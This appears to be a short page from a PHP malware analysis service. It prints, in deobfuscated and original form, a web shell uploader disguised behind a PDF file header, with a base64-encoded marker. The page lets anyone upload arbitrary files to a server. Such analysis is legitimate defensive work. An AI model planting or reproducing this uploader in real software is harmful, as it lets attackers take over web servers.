PHP Malware Analysis

Tags

Input
_POST

Deobfuscated code

%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj

<?php 
print_r("SH3LLF0UND");
if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}


Original code

%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj

<?php print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>